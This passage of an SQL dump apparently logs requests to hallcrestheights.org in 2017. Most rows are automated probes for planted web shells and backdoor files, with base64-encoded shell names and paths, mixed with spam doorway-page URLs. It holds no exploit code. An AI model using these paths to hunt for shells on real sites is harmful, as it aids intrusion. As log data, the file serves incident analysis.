00:00:00'),(11393,'http://hallcrestheights.org/RoseLeif.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:51:20','0000-00-00 00:00:00'),(11394,'http://hallcrestheights.org/shootme.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:51:48','0000-00-00 00:00:00'),(11395,'http://hallcrestheights.org/images/xxx.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:52:18','0000-00-00 00:00:00'),(11396,'http://hallcrestheights.org/wp-content/1ndex.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:52:42','0000-00-00 00:00:00'),(11397,'http://hallcrestheights.org/authenticating.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:55:18','0000-00-00 00:00:00'),(11398,'http://hallcrestheights.org/show.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:55:48','0000-00-00 00:00:00'),(11399,'http://hallcrestheights.org/cache/news.php?z3=SFNuNVV0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:56:20','0000-00-00 00:00:00'),(11400,'http://hallcrestheights.org/images/head.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:56:21','0000-00-00 00:00:00'),(11401,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:56:23','0000-00-00 00:00:00'),(11402,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:56:27','0000-00-00 00:00:00'),(11403,'http://hallcrestheights.org/media/reads.php?z3=SFNuNVV0LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:56:51','0000-00-00 00:00:00'),(11404,'http://hallcrestheights.org/files/files.php?z3=SFNuNVV0LnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:56:52','0000-00-00 00:00:00'),(11405,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=SFNuNVV0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:56:54','0000-00-00 00:00:00'),(11406,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/HSn5Ut.php',NULL,'','',1,0,'2017-07-27 17:57:59','0000-00-00 00:00:00'),(11407,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/HSn5Ut.php',NULL,'','',1,0,'2017-07-27 17:56:41','0000-00-00 00:00:00'),(11408,'http://hallcrestheights.org/wp-content/uploads/HSn5Ut.php',NULL,'','',1,0,'2017-07-27 17:58:04','0000-00-00 00:00:00'),(11409,'http://hallcrestheights.org/HSn5Ut.php',NULL,'','',1,0,'2017-07-27 17:58:06','0000-00-00 00:00:00'),(11410,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/HSn5Ut.php',NULL,'','',1,0,'2017-07-27 17:56:49','0000-00-00 00:00:00'),(11411,'http://hallcrestheights.org/cache/list.php?z3=SFNuNVV0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:58:28','0000-00-00 00:00:00'),(11412,'http://hallcrestheights.org/libraries/joomla/1ndex.php?z3=SFNuNVV0LnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:58:56','0000-00-00 00:00:00'),(11413,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=SFNuNVV0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-27 17:59:29','0000-00-00 00:00:00'),(11414,'http://hallcrestheights.org/images/laj.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:59:55','0000-00-00 00:00:00'),(11415,'http://hallcrestheights.org/log.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 18:00:00','0000-00-00 00:00:00'),(11416,'http://hallcrestheights.org/includes/u2p.php?z3=SFNuNVV0LnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 18:00:03','0000-00-00 00:00:00'),(11417,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=SFNuNVV0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 18:00:06','0000-00-00 00:00:00'),(11418,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=SFNuNVV0LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 18:00:08','0000-00-00 00:00:00'),(11419,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=SFNuNVV0LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 18:00:11','0000-00-00 00:00:00'),(11420,'http://hallcrestheights.org/wp-main.php?z3=SFNuNVV0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-27 18:00:16','0000-00-00 00:00:00'),(11421,'http://hallcrestheights.org/images/robots.txt.php?z3=SFNuNVV0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:58:59','0000-00-00 00:00:00'),(11422,'http://hallcrestheights.org/cli/40dd1d.php?z3=SFNuNVV0LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-07-27 17:59:02','0000-00-00 00:00:00'),(11423,'http://hallcrestheights.org/k49920-fadlajfn-i20162631-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap-uhgfqvjd.htm',NULL,'','',1,0,'2017-07-28 01:01:29','0000-00-00 00:00:00'),(11424,'http://www.hallcrestheights.org/lugd-ltrsmxx-k21912-hypzq-jllzoh-i20162634-njumnte-cwfogywb-iwyrurf-gvfcwqzh-ribn-knyfeebs.htm',NULL,'https://www.google.co.jp/','',2,0,'2017-07-28 03:49:56','0000-00-00 00:00:00'),(11425,'http://www.hallcrestheights.org/k19140-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-i20162628-wivsmqkr-fbmlkmst.htm',NULL,'https://www.google.co.jp/','',4,0,'2017-07-30 13:53:20','0000-00-00 00:00:00'),(11426,'http://hallcrestheights.org/tmp/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',6,0,'2017-08-02 05:27:25','0000-00-00 00:00:00'),(11427,'http://hallcrestheights.org/joomla/media/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:31:11','0000-00-00 00:00:00'),(11428,'http://hallcrestheights.org/templates/jtemplate/jtemplate.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:34:40','0000-00-00 00:00:00'),(11429,'http://hallcrestheights.org/media/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',12,0,'2017-08-02 05:34:54','0000-00-00 00:00:00'),(11430,'http://hallcrestheights.org/modules/mod_j2module/mod_j2module.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:36:58','0000-00-00 00:00:00'),(11431,'http://hallcrestheights.org/templates/j2template/j2template.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:40:03','0000-00-00 00:00:00'),(11432,'http://hallcrestheights.org/images/jlogo.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:40:57','0000-00-00 00:00:00'),(11433,'http://hallcrestheights.org/logs/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',12,0,'2017-08-02 05:45:05','0000-00-00 00:00:00'),(11434,'http://hallcrestheights.org/templates/jtemplate/j1template.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:45:23','0000-00-00 00:00:00'),(11435,'http://hallcrestheights.org/modules/mod_jmodule/mod_j1module.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 05:49:59','0000-00-00 00:00:00'),(11436,'http://hallcrestheights.org/templates/j9templates/j9templates.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:33:20','0000-00-00 00:00:00'),(11437,'http://hallcrestheights.org/modules/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:34:58','0000-00-00 00:00:00'),(11438,'http://hallcrestheights.org/language/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:38:06','0000-00-00 00:00:00'),(11439,'http://hallcrestheights.org/components/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:42:14','0000-00-00 00:00:00'),(11440,'http://hallcrestheights.org/templates/j11templates/j11templates.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:41:59','0000-00-00 00:00:00'),(11441,'http://hallcrestheights.org/plugins/jplugin/jplugin/j2plugin.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:43:57','0000-00-00 00:00:00'),(11442,'http://hallcrestheights.org/templates/jtemplates/jtemplates.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:46:12','0000-00-00 00:00:00'),(11443,'http://hallcrestheights.org/templates/j7templates/j7templates.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:48:40','0000-00-00 00:00:00'),(11444,'http://hallcrestheights.org/cache/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',7,0,'2017-08-02 12:50:40','0000-00-00 00:00:00'),(11445,'http://hallcrestheights.org/templates/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',5,0,'2017-08-02 12:51:56','0000-00-00 00:00:00'),(11446,'http://www.hallcrestheights.org/ajqxxuc-i20162631-uzaof-ifephi-k60073-ijimjn-jbogt/',NULL,'','',2,0,'2017-08-04 02:34:02','0000-00-00 00:00:00'),(11447,'http://www.hallcrestheights.org/dvisc-iwbv-k42584-wkux-krbzomsm-i20162632-vuclzuph-vqawuo.htm',NULL,'','',2,0,'2017-08-04 03:42:50','0000-00-00 00:00:00'),(11448,'http://www.hallcrestheights.org/i20162632-k15120-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-08-04 21:05:56','0000-00-00 00:00:00'),(11449,'http://www.hallcrestheights.org/events/7-press.feed?type=rss',NULL,'','',1,0,'2017-08-05 08:12:36','0000-00-00 00:00:00'),(11450,'http://www.hallcrestheights.org/events/7-press.feed',NULL,'','',2,0,'2017-08-06 10:58:42','0000-00-00 00:00:00'),(11451,'http://www.hallcrestheights.org/k21312-gnfz-nxvjxpa-i20162634-ltitj-shkyjy-ldpijaa-mdurtaen-pggwtdv-lxtdqkun.htm',NULL,'','',5,0,'2017-08-06 23:12:21','0000-00-00 00:00:00'),(11452,'http://hallcrestheights.org//sqlbak.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-07 00:15:43','0000-00-00 00:00:00'),(11453,'http://hallcrestheights.org//sql-bak.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:15:45','0000-00-00 00:00:00'),(11454,'http://hallcrestheights.org//email.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:42','0000-00-00 00:00:00'),(11455,'http://hallcrestheights.org//functions.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:44','0000-00-00 00:00:00'),(11456,'http://hallcrestheights.org//cache/cachee.php?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:48','0000-00-00 00:00:00'),(11457,'http://hallcrestheights.org//wp-admin/includes/rnnvhs.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWFkbWluL2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:23','0000-00-00 00:00:00'),(11458,'http://hallcrestheights.org//languages/rnnvhs.php?z3=UHRZZ2pFLnBocA==&z4=L2xhbmd1YWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:27','0000-00-00 00:00:00'),(11459,'http://hallcrestheights.org//images/rnnvhs.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:31','0000-00-00 00:00:00'),(11460,'http://hallcrestheights.org//wp-admin/network/rnnvhs.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',4,0,'2017-08-07 00:17:15','0000-00-00 00:00:00'),(11461,'http://hallcrestheights.org//language/en-GB/rnnvhs.php?z3=UHRZZ2pFLnBocA==&z4=L2xhbmd1YWdlL2VuLUdCLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:38','0000-00-00 00:00:00'),(11462,'http://hallcrestheights.org//cache/news.php?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:44','0000-00-00 00:00:00'),(11463,'http://hallcrestheights.org//tmp.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',5,0,'2017-08-07 00:18:48','0000-00-00 00:00:00'),(11464,'http://hallcrestheights.org//shootme.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-08-07 00:17:31','0000-00-00 00:00:00'),(11465,'http://hallcrestheights.org//configurationbak.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:53','0000-00-00 00:00:00'),(11466,'http://hallcrestheights.org//robots.txt.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:36','0000-00-00 00:00:00'),(11467,'http://hallcrestheights.org//jconfig.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:39','0000-00-00 00:00:00'),(11468,'http://hallcrestheights.org//media/reads.php?z3=UHRZZ2pFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:01','0000-00-00 00:00:00'),(11469,'http://hallcrestheights.org//wp-admin/users.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:05','0000-00-00 00:00:00'),(11470,'http://hallcrestheights.org//pols.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:48','0000-00-00 00:00:00'),(11471,'http://hallcrestheights.org//imdex.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:10','0000-00-00 00:00:00'),(11472,'http://hallcrestheights.org//aa.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:14','0000-00-00 00:00:00'),(11473,'http://hallcrestheights.org//ytt.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:17:57','0000-00-00 00:00:00'),(11474,'http://hallcrestheights.org//media/1ndex.php?z3=UHRZZ2pFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:47','0000-00-00 00:00:00'),(11475,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=UHRZZ2pFLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:18:30','0000-00-00 00:00:00'),(11476,'http://hallcrestheights.org//sql_dump.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:53','0000-00-00 00:00:00'),(11477,'http://hallcrestheights.org//error-logs.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:36','0000-00-00 00:00:00'),(11478,'http://hallcrestheights.org//media/404.php?z3=UHRZZ2pFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:39','0000-00-00 00:00:00'),(11479,'http://hallcrestheights.org//media/tmp.php?z3=UHRZZ2pFLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:41','0000-00-00 00:00:00'),(11480,'http://hallcrestheights.org//r3x.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:44','0000-00-00 00:00:00'),(11481,'http://hallcrestheights.org//log.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:49','0000-00-00 00:00:00'),(11482,'http://hallcrestheights.org//images/stories/0day.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:53','0000-00-00 00:00:00'),(11483,'http://hallcrestheights.org//includes/u2p.php?z3=UHRZZ2pFLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:58','0000-00-00 00:00:00'),(11484,'http://hallcrestheights.org//images/xxx.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:00','0000-00-00 00:00:00'),(11485,'http://hallcrestheights.org//al277.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:03','0000-00-00 00:00:00'),(11486,'http://hallcrestheights.org//wp-admin/options-media.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:07','0000-00-00 00:00:00'),(11487,'http://hallcrestheights.org//wp-content/advanced-cache.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:09','0000-00-00 00:00:00'),(11488,'http://hallcrestheights.org//roubt.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:19:53','0000-00-00 00:00:00'),(11489,'http://hallcrestheights.org//includes.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:16','0000-00-00 00:00:00'),(11490,'http://hallcrestheights.org//images/al277.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:20','0000-00-00 00:00:00'),(11491,'http://hallcrestheights.org//webconfig.txt.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:20:37','0000-00-00 00:00:00'),(11492,'http://hallcrestheights.org//thumb.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:02','0000-00-00 00:00:00'),(11493,'http://hallcrestheights.org//configbak.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:09','0000-00-00 00:00:00'),(11494,'http://hallcrestheights.org//wp-main.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:13','0000-00-00 00:00:00'),(11495,'http://hallcrestheights.org//robot.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:16','0000-00-00 00:00:00'),(11496,'http://hallcrestheights.org//install.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:20','0000-00-00 00:00:00'),(11497,'http://hallcrestheights.org//images/1ndex.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:23','0000-00-00 00:00:00'),(11498,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=UHRZZ2pFLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:07','0000-00-00 00:00:00'),(11499,'http://hallcrestheights.org//resd.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:10','0000-00-00 00:00:00'),(11500,'http://hallcrestheights.org//injctory.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:32','0000-00-00 00:00:00'),(11501,'http://hallcrestheights.org//mmytc.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:08','0000-00-00 00:00:00'),(11502,'http://hallcrestheights.org//M-F4r3s.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:21:52','0000-00-00 00:00:00'),(11503,'http://hallcrestheights.org//images/laj.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:16','0000-00-00 00:00:00'),(11504,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:21','0000-00-00 00:00:00'),(11505,'http://hallcrestheights.org//wsdl.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:26','0000-00-00 00:00:00'),(11506,'http://hallcrestheights.org//goog1es.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-08-07 00:22:12','0000-00-00 00:00:00'),(11507,'http://hallcrestheights.org//wp-admin/about.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:06','0000-00-00 00:00:00'),(11508,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=UHRZZ2pFLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:51','0000-00-00 00:00:00'),(11509,'http://hallcrestheights.org//update.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:13','0000-00-00 00:00:00'),(11510,'http://hallcrestheights.org//news.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:22:59','0000-00-00 00:00:00'),(11511,'http://hallcrestheights.org//SessionController.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:27','0000-00-00 00:00:00'),(11512,'http://hallcrestheights.org//maill.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:12','0000-00-00 00:00:00'),(11513,'http://hallcrestheights.org//error-log.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:39','0000-00-00 00:00:00'),(11514,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:43','0000-00-00 00:00:00'),(11515,'http://hallcrestheights.org//authenticating.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:29','0000-00-00 00:00:00'),(11516,'http://hallcrestheights.org//google-assist.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:52','0000-00-00 00:00:00'),(11517,'http://hallcrestheights.org//images/google-assist.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:56','0000-00-00 00:00:00'),(11518,'http://hallcrestheights.org//images/robots.txt.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:00','0000-00-00 00:00:00'),(11519,'http://hallcrestheights.org//yjh.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:44','0000-00-00 00:00:00'),(11520,'http://hallcrestheights.org//Ricsky.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:07','0000-00-00 00:00:00'),(11521,'http://hallcrestheights.org//elements.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:23:52','0000-00-00 00:00:00'),(11522,'http://hallcrestheights.org//xmlsrpc.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:14','0000-00-00 00:00:00'),(11523,'http://hallcrestheights.org//wp-cache.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:17','0000-00-00 00:00:00'),(11524,'http://hallcrestheights.org//images/404.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:00','0000-00-00 00:00:00'),(11525,'http://hallcrestheights.org//images/head.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:24','0000-00-00 00:00:00'),(11526,'http://hallcrestheights.org//cache/support.php?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:28','0000-00-00 00:00:00'),(11527,'http://hallcrestheights.org//RoseLeif.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:33','0000-00-00 00:00:00'),(11528,'http://hallcrestheights.org//Abbrevsprl.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:36','0000-00-00 00:00:00'),(11529,'http://hallcrestheights.org//show.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:41','0000-00-00 00:00:00'),(11530,'http://hallcrestheights.org//images/defau1t.php?z3=UHRZZ2pFLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:45','0000-00-00 00:00:00'),(11531,'http://hallcrestheights.org//cli/40dd1d.php?z3=UHRZZ2pFLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:24:28','0000-00-00 00:00:00'),(11532,'http://hallcrestheights.org//bk.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:25:53','0000-00-00 00:00:00'),(11533,'http://hallcrestheights.org//infos.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:01','0000-00-00 00:00:00'),(11534,'http://hallcrestheights.org//cache/defau1t.php?z3=UHRZZ2pFLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:04','0000-00-00 00:00:00'),(11535,'http://hallcrestheights.org//A.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-08-07 00:24:47','0000-00-00 00:00:00'),(11536,'http://hallcrestheights.org//bookmark.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:12','0000-00-00 00:00:00'),(11537,'http://hallcrestheights.org//wp-data.php?z3=UHRZZ2pFLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:21','0000-00-00 00:00:00'),(11538,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:26','0000-00-00 00:00:00'),(11539,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=UHRZZ2pFLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-08-07 00:26:29','0000-00-00 